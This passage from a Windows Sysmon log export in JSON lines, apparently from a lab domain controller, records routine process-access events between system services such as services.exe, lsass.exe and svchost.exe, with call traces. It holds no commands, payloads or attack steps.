C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.920","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001087BC0200}","TargetProcessId":"2888","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1231,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.923\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 2592\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001050C20200}\r\nTargetProcessId: 2352\r\nTargetImage: C:\\Windows\\system32\\dfssvc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.923","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"2592","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001050C20200}","TargetProcessId":"2352","TargetImage":"C:\\Windows\\system32\\dfssvc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1232,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.924\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B3410100}\r\nTargetProcessId: 2156\r\nTargetImage: C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.924","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B3410100}","TargetProcessId":"2156","TargetImage":"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1233,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.924\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.924","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1234,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.924\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1168\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.924","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"1168","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1235,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1236,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1237,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.926\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.926","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1238,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.928\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010BFBC0200}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 